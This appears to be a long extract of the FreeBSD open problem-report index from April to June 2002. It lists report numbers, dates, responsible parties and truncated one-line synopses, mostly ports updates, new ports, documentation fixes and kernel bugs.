ports/37412 ports kdebase2 port package does not create /us o [2002/04/24] kern/37417 Treat CT5880 revision4 ( PCM chip ) o [2002/04/24] ports/37418 ports New port: nload, network load monitor on o [2002/04/24] ports/37422 ports port upgrade news/diablo 3.0 -> 4.1 o [2002/04/24] bin/37424 nfsstat reports negative values o [2002/04/24] misc/37425 df gives wrong ouput > 1TB p [2002/04/24] docs/37429 keramida cvs(1) documents CVS_RSH incorrectly o [2002/04/24] misc/37434 dhclient generates pointless log messages o [2002/04/24] bin/37437 Add HTTP-style support to {vis,unvis}(1). o [2002/04/24] ports/37439 anders Alfred's Patches to thttpd port to use se o [2002/04/24] bin/37442 [PATCH] sleep.c to support time multiplie o [2002/04/25] ports/37446 znerd New port: jdictionary-eng-hun-expr 1.2 - p [2002/04/25] bin/37448 obrien [PATCH] ldd/rtld support for more informa o [2002/04/25] ports/37452 ports New port: devel/publib: Modular library o o [2002/04/25] docs/37457 doc acpi(4) man page references non-existant o [2002/04/25] ports/37459 ports Patch for ocaml-pcre port (PR 37354) o [2002/04/25] ports/37462 jmz dvips is no more available separately fro o [2002/04/25] docs/37465 doc Handbook needs new section o [2002/04/25] ports/37469 ports new port: otc o [2002/04/25] docs/37470 doc jail field not documented in procfs(5) o [2002/04/25] ports/37474 ports freeamp doesn't build on -current o [2002/04/25] ports/37476 ports Updating the port of biology/molden o [2002/04/26] kern/37486 Bug in network stack in sending broadcast p [2002/04/26] docs/37489 asmodai "arp implementation only supports 10Mb/s o [2002/04/26] ports/37491 ports new port mail/py-milter o [2002/04/27] docs/37504 doc The word PC Card should be used instead o o [2002/04/27] ports/37505 znerd cupsd.sh prints 'cupsd ' iso ' cupsd' p [2002/04/27] misc/37516 ru installworld fails in usr.bin/strip if NO o [2002/04/27] ports/37518 grog gmat port CATALOG needs updating o [2002/04/28] ports/37521 ports new port: security/autossh o [2002/04/28] kern/37526 Addtron card not being recognized by driv o [2002/04/28] ports/37536 ports New port: games/doomlegacy o [2002/04/28] ports/37542 jmz XFree86 4.2.0 Server MGA G550 Corrupted H o [2002/04/29] kern/37554 [PATCH] Make ELF shared libraries immutab o [2002/04/29] kern/37555 vnode flags appear to be changed in non-s o [2002/04/29] docs/37557 doc there is no ciss(4) RAID controller man p o [2002/04/29] docs/37558 doc there is no iir(4) RAID controller man pa o [2002/04/29] docs/37559 doc there is no ida(4) RAID man page o [2002/04/29] misc/37562 jdp Incorrect information in /usr/share/examp o [2002/04/29] ports/37567 ports New port devel/qextmdi o [2002/04/29] misc/37569 [PATCH] Extend fstab(5) format to allow f o [2002/04/29] bin/37572 des libfetch(3)/fetch(1): requested feature: o [2002/04/29] ports/37574 taoka ports/print/pips-sc20 file not found on m a [2002/04/29] ports/37576 portmgr Opening new port category hungarian o [2002/04/29] ports/37577 ports New port: mail/spamass-milter o [2002/04/30] ports/37594 ports Update port misc/mango to 0.11 (SUPERCEED o [2002/04/30] ports/37595 ports New port: math/py-numarray o [2002/04/30] ports/37596 ports EMACS_PORT_NAME=xemacs21 forks make infin o [2002/04/30] ports/37597 ports aureal-kmod-1.5_3 fails to build o [2002/04/30] kern/37600 [Partial PATCH] t4dwave drive doesn't rec o [2002/04/30] conf/37611 phk proposed /etc/rc.jails for jail(8) manage o [2002/05/01] ports/37630 kde KDE does not work with IPv6 o [2002/05/01] ports/37632 ports new port: pstack o [2002/05/01] misc/37634 FTP site problem - packages link points t o [2002/05/01] ports/37638 ports gd doesn't build with TrueType support o [2002/05/01] ports/37649 dirk devel/pear: unbreaking, upgrading to 4.2, o [2002/05/01] bin/37650 Add skipPCCARD variable to sysinstall o [2002/05/01] ports/37654 ports Update textproc/xml4j to 4.0.1HTML conve o [2002/05/20] ports/38339 ports New Port: Stylesheets for TEI->FO convers o [2002/05/20] ports/38340 ports New Port: DTD parser and clean-up tool o [2002/05/20] ports/38341 ports New Port: Customize TEI DTDs o [2002/05/20] ports/38346 jkh ports/net/cvsupit couldn't get enough fil o [2002/05/20] misc/38347 new library function abs2rel and rel2abs. o [2002/05/20] ports/38351 ports mod_php4(WITH_APACHE2) +apache2(WITH_THRE o [2002/05/20] ports/38365 ports devel/swarm update for Java support o [2002/05/21] kern/38372 patch for puc(4) to support parallel port o [2002/05/21] bin/38388 request to add "openssl starttls" command o [2002/05/21] ports/38389 ports bad mode icons/freebsd.gif o [2002/05/21] ports/38396 ports jikes option "-encoding" does not work an o [2002/05/22] ports/38406 obrien incorrect .so in g++31.1 man page o [2002/05/22] ports/38408 wjv zope-zmysqlda does not run o [2002/05/22] kern/38419 add name "CanoScanN676U" in uscanner o [2002/05/22] docs/38426 doc extra manpage .Xr to locate relevant sysc o [2002/05/22] kern/38429 [PATCH] getgpid and getsid work for proce p [2002/05/22] bin/38442 tjr possible bug in /bin/sh: inconsistency be o [2002/05/22] kern/38445 Centralized ptrace() permission checking o [2002/05/23] www/38448 www New cvsweb mirror in San Marino o [2002/05/23] ports/38450 ports New Port: audio/blop: Bandlimited oscilla o [2002/05/23] ports/38451 kris the package of totd-1.3_1.tgz seems incor o [2002/05/23] misc/38452 Logitech USB iFeel: device_probe_and_atta o [2002/05/23] ports/38454 ports Mark devel/rlwrap BROKEN on -STABLE o [2002/05/23] ports/38457 ports ports/squidpurge points to different squi o [2002/05/23] kern/38458 There is no a file iicbb_if.c on source t o [2002/05/23] bin/38467 less can dump core, FPU exception o [2002/05/23] misc/38468 Write drivers for Intel PRO/Wireless 2011 o [2002/05/23] ports/38476 ports ports/security/nmapfe: install problem o [2002/05/23] i386/38477 qa In sysinstall's Choose Distributions scre o [2002/05/23] i386/38478 qa In sysinstall's Choose Distributions scre o [2002/05/23] i386/38479 sysinstall vs. adduser UID inconsistency o [2002/05/23] i386/38480 qa sysinstall should prompt for normal users o [2002/05/23] i386/38481 adduser typo: 'already exist' o [2002/05/23] ports/38485 kde [update port] audio/arts 1.0.0 -> 1.0.1 o [2002/05/24] ports/38493 nbm Port update: mail/courier-imap o [2002/05/24] www/38500 www gnats web form is overenthusiastic about o [2002/05/24] ports/38516 ports ICQv7 transport for the Jabber Server o [2002/05/24] i386/38524 cons25 doesn't support F-keys beyond 12 p [2002/05/24] bin/38531 ru route(8) fails to suppress output o [2002/05/25] ports/38539 ports New port: devel/libcfg+ o [2002/05/25] docs/38540 rpratt sysinstall application name should be Sys o [2002/05/25] ports/38541 ports ghostscript-gnu checksum mismatch for a d o [2002/05/25] ports/38546 ports [MAINTAINER UPDATE] audio/cplay-1.45 clea o [2002/05/25] ports/38555 ports New port: x11-toolkits/frantk (A GUI libr o [2002/05/25] docs/38556 doc EPS file of beastie, as addition to exist o [2002/05/25] ports/38557 ports New port: graphics/sinek | please close 3 o [2002/05/25] conf/38559 rc.network hangs for a long time attempti o [2002/05/26] ports/38563 keith chinese/ghostscript6 print/ghostscript-gn o [2002/05/26] docs/38568 doc Minor improvements to PPPoA section o [2002/05/26] bin/38573 ping -o option (exit after one reply) o [2002/05/26] docs/38574 doc CPUTYPE is not documented in make.conf o [2002/05/26] kern/38575 NoName USB Flash drive not working o [2002/05/26] misc/38583 qa sysinstall installs crypto sources when / o [2002/05/26] ports/38593 portmgr Third level ports o [2002/05/26] i386/38596 freebsd 4.6rc2 can't support ati videocar o [2002/05/27] docs/38603 doc Tags addition and minor changes to cvsup- o [2002/05/27] ports/38604 ports Update port: devel/hmake o [2002/05/27] bin/38610 qa Sysinstall should be able to mount ISO im o [2002/05/27] ports/38616 ports Build options in Makefile.local are ignor o [2002/05/27] docs/38618 doc Malloc types can be used with multiple al o [2002/05/27] docs/38620 doc Committers Guide and CVS o [2002/05/27] ports/38621 mita Update port: print/ghostscript-gnu-commfo o [2002/05/27] ports/38624 ports linc will not be installed by ORBit2 o [2002/05/27] kern/38626 dummynet/traffic shaper: RED: max_th and o [2002/05/27] docs/38630 doc Missing line break in handbook/ppp-and-sl o [2002/05/27] docs/38631 doc Update notes on CVS commit messages in Co o [2002/05/27] ports/38633 ports update port: graphics/xmms-iris o [2002/05/27] ports/38635 ports new port: comms/bforce-kst o [2002/05/27] ports/38638 ports New ports : gfaim 0.30 o [2002/05/27] ports/38641 ports New port: net/dyndns-service o [2002/05/27] ports/38642 ports Fatal server error o [2002/05/27] bin/38643 ssh doesn't fail over from protocol 1 to o [2002/05/27] docs/38647 doc cvsupit built-in instructions are slightl o [2002/05/28] ports/38655 ports Update New port : ports/38641 (DynDns Ser o [2002/05/28] kern/38657 fujitsu c4110 lifebook crashes on resume o [2002/05/28] ports/38663 ports New Port: Mono .NET runtime and C# compil o [2002/05/28] www/38664 www Stale info about Java due to be released o [2002/05/28] docs/38668 doc More s/IPSec/IPsec o [2002/05/28] ia64/38677 ia64 savecore fault when 1M buffer is allocate o [2002/05/28] ia64/38678 ia64 vinum fails to build due to @gprel reloca o [2002/05/29] bin/38686 des fetch -T n is not timeout correctly when o [2002/05/29] ports/38687 ports Update port: security/fwbuilder o [2002/05/29] ports/38688 ports new port of palmos-sdk4 o [2002/05/29] ports/38689 kuriyama update of port palm/prc-tools f [2002/05/29] ports/38690 ports New port: security/libfwbuilder, API need o [2002/05/29] ports/38696 ports libwmf port configure failure (with worka o [2002/05/29] ports/38718 ports Update port: net/ysm add recoding of offl o [2002/05/29] misc/38724 portmgr [patch] various .mk files use deprecated o [2002/05/29] ports/38725 ports new port: biology/L-Breeder o [2002/05/29] misc/38727 mptable should complain about garbage arg o [2002/05/29] docs/38728 doc How To Contribute should recommend unifie o [2002/05/29] ports/38729 ports Partially fix compile of XF86-4 on -curre o [2002/05/29] kern/38730 Memorex scrollpro mouse is not fully func o [2002/05/30] ports/38739 ports New port: nc6 o [2002/05/30] kern/38745 improper ordering of mbinit() wrt. device o [2002/05/30] kern/38749 Diskless booting fails with some DHCP ser o [2002/05/30] ports/38751 ports Port for discid o [2002/05/31] docs/38772 doc firewall_type feature not mentioned on Ha o [2002/05/31] docs/38774 doc 4.x should be 4.X in section 6.11.2 of th o [2002/05/31] docs/38776 doc In the FAQ 4.X, 3.X, etc... should be use o [2002/05/31] docs/38777 doc In articles 4.x, 3.x should be 4.X and 3. o [2002/05/31] ports/38787 jim Update port: net/everybuddy to 0.4.2 (fix o [2002/05/31] ports/38790 nakai icewm - ALT-TAB graphical glitches o [2002/05/31] kern/38792 Cannot play audio on a VIA VT8233 chipset f [2002/06/01] ports/38793 ports New port: www/links-devel v2.0p6 o [2002/06/01] docs/38798 doc Bento is not mentioned as project o [2002/06/01] ports/38800 ports update www/roxen to Roxen WebServer 2.2.2 o [2002/06/02] ports/38805 ports New port: devel/greencard (A foreign func o [2002/06/02] ports/38806 dirk Please upgrade the LyX port to version 1. o [2002/06/02] docs/38810 doc Minor change in section 2.13.5 of the Han o [2002/06/02] docs/38815 doc Many typo fixed, and a question left unan o [2002/06/02] docs/38816 doc No man page for BootMgr? o [2002/06/02] docs/38817 doc /usr/share/man/man8/boot.8.gz documents / o [2002/06/02] ports/38820 keith Update port: chinese/ttfm update abiword o [2002/06/02] ports/38821 gnome graphics/gimp1 complains about missing Gi o [2002/06/02] ports/38823 anders minicom: Checksum mismatch for minicom-2. o [2002/06/02] ports/38824 sf wget cannot handle files >2GB o [2002/06/02] i386/38826 RFE: BootMgr should provide more identify o [2002/06/02] kern/38828 DPT PM2012B/90 doesn't work o [2002/06/02] conf/38829 bootblock recompile instructions in handb o [2002/06/02] ports/38830 greid update devel/libtar to 1.2.5 o [2002/06/02] misc/38839 inconsistent spelling of communism in for o [2002/06/03] docs/38846 doc [PATCH] CTM section out of date p [2002/06/03] docs/38850 keramida handbook/kernelopts/ should be in Develop o [2002/06/03] ports/38852 ports graphics/gdal : fix md5, upgrade to 1.1.7 o [2002/06/03] ports/38853 portmgr net/ethereal: configure fails o [2002/06/03] misc/38854 Resetting the sysinstall during setup cau o [2002/06/03] ports/38855 ports net/gtk+licq does not work o [2002/06/03] misc/38857 obrien "file" command hangs when using "-z" opti o [2002/06/03] ports/38861 ports www/auth_ldap compiles-installs but fails o [2002/06/03] bin/38862 ping6 prints an annoying extra newline af o [2002/06/03] i386/38863 Burning CDs crashes since 4.6stable o [2002/06/03] misc/38870 kernel-panic when coping data from a NFS- o [2002/06/03] ports/38876 tegge devel/linuxthreads: pkg-plist ignores NOP f [2002/06/04] kern/38886 Maxtor 3000LE requires another sys/cam/sc o [2002/06/04] ports/38897 ports Port update: devel/pcsc-lite o [2002/06/04] ports/38898 ports Port update: devel/ruby-pcsc-lite o [2002/06/04] ports/38899 ports New port: Yahoo transport for the Jabber o [2002/06/04] ports/38900 ports Update port: net/qtella Upgrade to versio o [2002/06/05] ports/38914 ports New Port: zed o [2002/06/05] ports/38915 ports New port: "MOVA" - Scripts for Work with o [2002/06/05] ports/38917 nik Update port: print/jadetex (create jadete o [2002/06/05] i386/38919 A Belkin 802.11 PCMCIA card is not recogn o [2002/06/05] kern/38923 Incorrect device use count prevents door o [2002/06/05] docs/38924 gshapiro Mailwrapper(8) or mailer.conf(5) should m o [2002/06/05] bin/38928 [PATCH] ftpd(8) logs aborted transfers in o [2002/06/05] bin/38930 ANSI-fy main() of src/usr.bin/colldef fix o [2002/06/05] bin/38931 Cleanup for WARNS=4 of src/games/fortune/ o [2002/06/05] misc/38937 delay between tracks in digital audio dum o [2002/06/05] ports/38938 ports New port: gnome/bubblemon - A CPU and mem o [2002/06/05] bin/38940 Change: an option to *stat to allow supre o [2002/06/06] ports/38950 ports perforce Makefile doesn't do PORTREVISION o [2002/06/06] ports/38952 ports Upgrade omniORB to 3.0.5 o [2002/06/06] ports/38955 ports Update port py-omniorb to version 1.5 o [2002/06/06] gnu/38956 stock awk installs gawk.1 manpage, overri o [2002/06/06] ports/38958 ports New port: MySQLMan - a web based MySQL da o [2002/06/06] ports/38959 kde KDE3 - related ports are broken on -CURRE o [2002/06/06] ports/38961 znerd mod_jk, dependencies outdated o [2002/06/06] misc/38965 kde [PATCH] kapptemplate fails on FreeBSD o [2002/06/06] ports/38966 kde [PATCH] AUTO_SUBDIRS used instead of AUTO o [2002/06/06] kern/38967 4/22/02 pcm driver merge appears to break o [2002/06/06] ports/38968 joerg Fix port: devel/avr-libc (repect PREFIX) o [2002/06/07] docs/38982 doc developers-hanbook/Jail fix o [2002/06/07] kern/38986 a change to msdosfs permissions behaviour o [2002/06/07] ports/38989 assar Fix to BROKEN arla port (arla-0.35.6) f [2002/06/07] misc/39002 gnome Nautilus doesn't start o [2002/06/07] ports/39005 sobomax freetype2 port fetches an HTML page, not o [2002/06/07] ports/39007 ports ringtonetools for the ports f [2002/06/08] i386/39023 Keystrokes yield extended ASCII o [2002/06/08] docs/39025 doc Minor changes in section 3.9 of the Handb o [2002/06/08] ports/39030 ports New port: www/p5-Apache-Gallery - mod_per f [2002/06/08] kern/39031 bugreport: kernel o [2002/06/08] docs/39038 doc Reference in a non existent man page. o [2002/06/08] ports/39041 phantom Update port: devel/bugzilla update to 2.1 o [2002/06/08] docs/39044 doc The man page for rot13(6) never mentions o [2002/06/08] kern/39047 IPSEC Compression (IPCOMP) broken in tunn o [2002/06/08] ports/39050 ports fix DRI for wine use o [2002/06/08] ports/39053 ports Maintainer Update: cups, cups-base and cu o [2002/06/08] ports/39054 portmgr Support USE_OPENSSL=yes in bsd.port.mk o [2002/06/08] docs/39055 doc PR Handling Guidelines: clean up typos, c o [2002/06/09] ports/39059 ports New port: IMCom command-line Jabber clien o [2002/06/09] docs/39060 doc Typos (Ths, counties) in share/misc/iso31 o [2002/06/09] ports/39062 ports beep: beep for a pitch and duration o [2002/06/09] ports/39063 jim added a WITH_PYTHON to xchat o [2002/06/09] ports/39066 ports Update to ports/misc/uf-view o [2002/06/09] www/39068 www Hypertext man pages use strange hyphen at o [2002/06/09] www/39074 www Link to FreeBSD Italian Handbook o [2002/06/09] ports/39080 sobomax java/javavmwrapper: Functionality enhance o [2002/06/09] docs/39084 doc Various tweaks to doc/en_US.ISO8859-1/boo o [2002/06/09] i386/39085 /boot/loader.conf is missing some entries o [2002/06/09] ports/39086 ports Update kappdock to 0.46-1 so as to run un o [2002/06/10] docs/39093 doc [PATCH] grammar nits in gif(4) man page o [2002/06/10] ports/39094 portmgr request for new category: parallel o [2002/06/10] ports/39095 ports ports/net/nttcp and ports/net/ttcp appear o [2002/06/10] docs/39101 doc Misplaced parenthesis in the FAQ? o [2002/06/10] ports/39102 portmgr new category requested: finance o [2002/06/10] ports/39103 portmgr new virtual category requested: accessib o [2002/06/10] misc/39105 "man" command shows errors when viewing h o [2002/06/10] ports/39114 ports Checksum mismatch in flvw port p [2002/06/10] bin/39116 tjr /usr/bin/printf o [2002/06/10] ports/39124 ports upgrade ports/russian/fortunerus p [2002/06/10] conf/39125 dougb [PATCH] /etc/usbd.conf should enable curs o [2002/06/10] docs/39129 doc handbook; type WRT simulating postscript o [2002/06/10] ports/39131 ports litestream port obsolete o [2002/06/10] ports/39133 nbm upgrade port: phpMyAdmin o [2002/06/10] ports/39136 ports Enable arts in SDL o [2002/06/10] ports/39137 ports update port: qmail-tls o [2002/06/11] ports/39140 ports New Port: Acrobat Reader 5 CJK font packs o [2002/06/11] ports/39144 ports Port Upgrade (parmetis) o [2002/06/11] ports/39147 ports minor editors/emacs20 build problem o [2002/06/11] ports/39150 ports delete-ports: games/uclient games/acorn g o [2002/06/11] ports/39154 ports new port: emulators/grustibus o [2002/06/11] ports/39159 ports New port: graphics/gtkam (fix ports/39119 o [2002/06/11] bin/39163 dwmalone -nt/-ot in test(1) does not detect if tv_ o [2002/06/11] docs/39164 doc Misprint in units(1).lib (aganist) o [2002/06/11] ports/39166 ports new port: www/p5-Apache-AntiSpam o [2002/06/11] ports/39174 ports Need port of SBCL (Steel Bank Common Lisp o [2002/06/11] ports/39178 ports new port: games/crack-attack (An OpenGL g o [2002/06/11] ports/39182 ports netsaint-plugins util.c functions don't q o [2002/06/11] ports/39183 knu Typos in pkgdb man page o [2002/06/12] ports/39189 ports lang/clisp needs gcc295 (coredumps with 3 o [2002/06/12] docs/39190 blackend Missing quote tags in releng-packages art o [2002/06/12] ports/39191 ports new port: www/p5-CGI-Session o [2002/06/12] conf/39192 [PATCH] Save pcm mixer settings during re o [2002/06/12] ports/39193 ports [maintainer-update] net/papaya update to o [2002/06/12] ports/39197 sobomax /usr/ports/archivers/ucl is outdated o [2002/06/12] bin/39198 sh aborts on variables with periods o [2002/06/12] misc/39201 ptrace(2) and rfork(RFLINUXTHPN) confuse o [2002/06/12] misc/39202 ata(4) refer to sysctl(8) instead of atac o [2002/06/12] ports/39203 dwcjr Unclear BREAK message in port net/samba o [2002/06/12] ports/39204 ports New port: deskutils/mnemo, a web-based no o [2002/06/12] bin/39206 core dump bug in sshd o [2002/06/12] ports/39207 ports [NEW PORT] x11-toolkits/gtk20-apireferenc p [2002/06/12] bin/39210 tjr Update usage and manual for env to show t o [2002/06/12] docs/39213 doc No rc(4) man page o [2002/06/12] docs/39214 doc No my(4) man page o [2002/06/12] ports/39215 nakai Update emulators/gngb to latest snapshot o [2002/06/12] bin/39217 cp returns non-zero when copying a symlin o [2002/06/13] ports/39219 ports ddd port not builds on -CURRENT o [2002/06/13] ports/39228 ports native port of vsound 0.5 o [2002/06/13] misc/39229 instruction pointer = 0x8:0xc00eaf13 o [2002/06/13] ports/39250 ports New port: lang/cmucl-extra o [2002/06/13] ports/39251 chuckr Update octave port o [2002/06/13] standards/39256standards[v]snprintf aren't POSIX-conformant for s o [2002/06/13] docs/39257 doc printf manpage doesn't document error ret o [2002/06/13] ports/39258 anders mail/cclient doesn't build on freebsd/spa o [2002/06/14] ports/39262 ports Update port: comms/hylafax ${PERL} -> ${R o [2002/06/14] ports/39263 ports Update port: devel/ecgi ${PERL} -> ${REIN o [2002/06/14] ports/39264 ports Update port: devel/tkcon ${PERL} -> ${REI o [2002/06/14] ports/39265 ports Update port: lang/itcl ${PERL} -> ${REINP o [2002/06/14] ports/39266 ports Update port: x11/gdkxft ${PERL} -> ${REIN o [2002/06/14] ports/39267 ports Update port: x11-toolkits/itk ${PERL} -> o [2002/06/14] ports/39273 ports Update port: cad/xcircuit ${PERL} -> ${RE o [2002/06/14] ports/39275 ports Update port: astro/xephem ${PERL} -> ${RE o [2002/06/14] ports/39283 ports Update port: audio/midimountain ${PERL} - o [2002/06/14] docs/39293 doc the dumpon man page incorrectly states th o [2002/06/14] ports/39295 ports Update port: benchmarks/postal ${PERL} -> o [2002/06/14] ports/39304 ports Maintainer Update: textproc/jdictionary ( o [2002/06/14] conf/39306 The /etc/rc file should know if is runnin o [2002/06/14] ports/39307 ports New port: ASpath-tree a IPv6 route stabil o [2002/06/14] ports/39308 portmgr New port: hu-ispell 0.85 (Hungarian spell o [2002/06/14] bin/39311 re you can't enable inetd in sysinstall with o [2002/06/14] ports/39312 ports [PATCH] Addition of mysql-awareness to mo f [2002/06/14] ports/39316 gnome gnome2-2.0_2 port install is unclean o [2002/06/14] ports/39317 hoek uulib port fails to build due to sed(1) r a [2002/06/14] ports/39321 ports New port: korean/mplayer-fonts o [2002/06/15] misc/39326 execve() for ELF exe drops VTEXT when re- o [2002/06/15] ports/39342 sobomax Add automatic truetype support to Mozilla o [2002/06/15] misc/39347 use of /usr/bin/* utils in /etc/rc.diskle o [2002/06/15] docs/39348 doc kenv fetch of hostname requires dhcp/boot o [2002/06/15] ports/39349 ports build fix of databases/db3 for -current o [2002/06/15] misc/39353 /usr/share/examples/diskless clone root c o [2002/06/15] ports/39357 ports Maintainer update: biology/ncbi-toolkit o [2002/06/16] misc/39360 If linux emu is added as a dependency (an o [2002/06/16] ports/39361 ports New port: chinese/xpdf o [2002/06/16] bin/39362 dan ftpd(8) cannot NLST with options in some o [2002/06/16] ports/39364 ports new port: cad/gwave o [2002/06/16] docs/39367 doc Bad link at http://www.FreeBSD.org/handbo o [2002/06/16] ports/39370 ports Update port: japanese/dvipsk-vflib o [2002/06/16] ports/39371 ports o [2002/06/16] ports/39375 ports astro/seti_applet depends on libgtop whic o [2002/06/16] ports/39383 ports update for comms/qpage port o [2002/06/16] ports/39387 ports Ymessenger fails to install correctly fro o [2002/06/16] ports/39390 gnome Make graphics/imlib not depend upon GTK+ o [2002/06/16] docs/39393 doc Minor typos in atacontrol(8) f [2002/06/16] misc/39394 4.6 does not run as VMware guest OS o [2002/06/16] docs/39395 doc typos in man pages o [2002/06/17] ports/39400 tobez update devel/p5-IPC-Run from 0.44 to 0.74 o [2002/06/17] ports/39406 ports Update port: devel/sip o [2002/06/17] ports/39407 ports Update port: x11-toolkits/py-qt o [2002/06/17] ports/39413 ports [maintainer-update] net/gnugadu o [2002/06/17] ia64/39415 ia64 Bootloader assuming 8KB buffer when only o [2002/06/17] ports/39416 ports New port: t2ps o [2002/06/17] ports/39417 gnome gtk-config and glib-config filename conve o [2002/06/17] ports/39421 ports New Port: smapi2-library for various FTN- f [2002/06/17] misc/39422 dwcjr samba-2.2.5.p1 is marked as broken: Requi o [2002/06/17] kern/39423 silby vr0 watchdog timeout o [2002/06/17] misc/39425 Auto mounted directory was not found at b o [2002/06/17] ports/39426 trevor Update port: biology/xdrawchem to 1.3.2 o [2002/06/17] ports/39435 jim Update port: mail/wmbiff to 0.4.1 o [2002/06/17] misc/39439 tcopy will not duplicate tapes with block o [2002/06/17] ports/39440 dima Make pilot-link compile with GCC3 on -CUR o [2002/06/17] docs/39446 doc Typo in bind(2) o [2002/06/17] ports/39454 portmgr net/kmsn needs to be replaced by kmerlin o [2002/06/18] bin/39462 [PATCH] add -g option to finger o [2002/06/18] bin/39463 [PATCH] Add several options to fingerd o [2002/06/18] misc/39466 find -xdev hangs on dead NFS mounts (/etc o [2002/06/18] ports/39469 ports new FreeBSD port mail/avcheck o [2002/06/18] ports/39470 ports Update port: devel/sdts++ o [2002/06/18] docs/39471 doc new chapter to the developer-handbook o [2002/06/18] misc/39476 profxp will run but when you fxp a file i o [2002/06/18] ports/39487 mharo portlint doesn't accept MASTER_SITE/DISTF o [2002/06/18] ports/39489 ports Update port: print/ghostscript-afpl (fix o [2002/06/18] ports/39490 ports Update port: print/ghostscript-gnu (fix p o [2002/06/18] ports/39492 portmgr devel/autoconf picks up non-standard shel o [2002/06/18] docs/39495 doc firewall man page should allow ICMP type o [2002/06/19] ports/39500 ports [PATCH] www/eddie: Fix build issue o [2002/06/19] ports/39504 gnome textproc/libxml2 & invalid XML catalogs i o [2002/06/19] conf/39505 automate BUILDNAME variable for releases o [2002/06/19] docs/39511 doc Incomplete answer to question 14.8. o [2002/06/19] docs/39514 doc markup for ppp.conf and ppp.co o [2002/06/19] kern/39527 dwmalone getcwd() and unreadable parent directory o [2002/06/19] docs/39530 doc access(2) man page has unnecessarily broa o [2002/06/19] misc/39531 Gaim default builds WITH_GNOME o [2002/06/19] docs/39532 doc 'find' man page should o [2002/06/19] conf/39537 External ThinkPad 240 cdrom does not work o [2002/06/19] ports/39538 ports New Port: chinese/openoffice-zh_TW o [2002/06/19] ports/39540 pat New port: devel/hat --- This was formerly o [2002/06/19] ports/39544 ports mayavi port disfunctional o [2002/06/19] ports/39550 ports the port doesn't install all the files li o [2002/06/19] ports/39554 ports [PATCH] Update p5-AxKit 1.5_1 -> 1.6 o [2002/06/20] ports/39565 ports Fix tidy on FreeBSD 5.0-CURRENT... o [2002/06/20] ports/39570 petef Update port : www/mod_layout 3.0.3 -> 3.2 o [2002/06/20] bin/39573 uid 0 check in install.sh in 4.6-disc1.is o [2002/06/20] i386/39574 Error mounting /dev/acd0c on /dist: No su o [2002/06/20] bin/39576 [PATCH] tail -f for multiple files o [2002/06/20] bin/39578 add more russian holydays o [2002/06/20] conf/39580 insecure default settings o [2002/06/20] misc/39583 {en_US,ko_KR,ja_JP}.UTF-8 Locale Support o [2002/06/20] i386/39584 ln -f fails to unlink o [2002/06/20] ports/39585 nbm Update of ports/mail/courier-imap to 1.4. o [2002/06/20] kern/39592 the system got reboot without any reason o [2002/06/20] ports/39593 znerd jakarta-tomcat has unnecessary and/or inc o [2002/06/20] ports/39597 ports New port: jdictionary-eng-hun 1.4 - Hunga o [2002/06/20] ports/39598 ports New port: jdictionary-eng-hun-expr 1.4 - o [2002/06/20] ports/39600 znerd New port: jdictionary-ger-hun 1.4 - Germa o [2002/06/20] ports/39601 ports New port: JDictionary plugin: French-Hung o [2002/06/20] ports/39602 ports New port: JDictionary plugin: Interlingua o [2002/06/20] ports/39603 znerd New port: jdictionary-eng-ger 1.4 - Engli o [2002/06/20] ports/39606 ports Updated port: audio/lame (3.92) o [2002/06/20] ports/39608 ports upgrade games/cgoban to 1.9.13 o [2002/06/20] ports/39610 ports update www/p5-Apache-DBI to 0.89 o [2002/06/20] kern/39611 comcontrol.8 misstates drainwait default p [2002/06/21] bin/39617 traceroute fd_set allocation bug o [2002/06/21] conf/39618 /etc/security script doesn't return a ker o [2002/06/21] misc/39619 flashplugin-mozilla crashes and doesnt pl o [2002/06/21] ports/39620 ports flashplugin-mozilla crashes when viewing o [2002/06/21] ports/39621 ports isc-dhcpd server can't get all network in o [2002/06/21] docs/39624 doc -unlink primary missing from find manpage o [2002/06/21] ports/39627 chein new camserv won't compile, use old for no o [2002/06/21] misc/39628 Please add new terminal definition to /us o [2002/06/21] ports/39631 ports port eyeclock unaligned access on alpha o [2002/06/21] ports/39634 jim Port pclock unaligned access on alpha o [2002/06/21] ports/39640 ports Update port: devel/rlwrap to 0.12 o [2002/06/21] ports/39644 ports new port: graphics/sinek - a libxine base o [2002/06/22] kern/39650 Digital audio extraction on an atapi CD d o [2002/06/22] ports/39654 ports Gotmail fails in locating folder index o [2002/06/22] ports/39658 ports MPICH port is still broken f [2002/06/22] ports/39666 ports New Port: gwenview (Graphicbrowser for KD o [2002/06/22] ports/39673 ports netsaint-plugins fails to install command o [2002/06/22] bin/39676 lukemftpd manual pages fix + examples o [2002/06/22] ports/39678 ports New port: www/tidy-devel (latest version o [2002/06/22] docs/39679 doc bootfile separator is wrong in loader.con o [2002/06/22] kern/39681 hidden kernel boot tunables added to sysc o [2002/06/22] ports/39683 keith Update port: chinese/moefonts-cid o [2002/06/22] ports/39684 keith Delete port: chinese/ghostscript6 o [2002/06/22] ports/39686 mbr [PATCH] www/mod_frontpage: Detect Documen o [2002/06/23] ports/39690 ports Update - New Port: gwenview (Graphicbrows o [2002/06/23] ports/39693 ports Stop in /usr/ports/japanese/kterm. o [2002/06/23] ports/39697 ports New port: arson - CD burning and ripping o [2002/06/23] ports/39705 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39706 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39707 ports New Port: scmxx 0.6.1.3 (Data Exchange ut o [2002/06/23] ports/39708 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39709 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39710 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39714 alane ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39717 nbm update of courier-imap port. o [2002/06/23] ports/39723 ports New port: hu-phone - Hungarian phone code o [2002/06/23] ports/39728 ports New port: hu-zipcodes - Hungarian post co o [2002/06/23] ports/39730 ports Maintainer update port: devel/kprof updat o [2002/06/23] docs/39743 doc o [2002/06/23] ports/39744 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39745 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] docs/39747 doc o [2002/06/23] docs/39748 doc [PATCH] Some changes to aio_*(2) o [2002/06/23] ports/39749 phantom Update port: devel/bugzilla - ${PERL} -> o [2002/06/23] docs/39751 doc handbook/ports-using.html sysinstall clar o [2002/06/23] ports/39755 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39756 ports strip -> ${STRIP_CMD} o 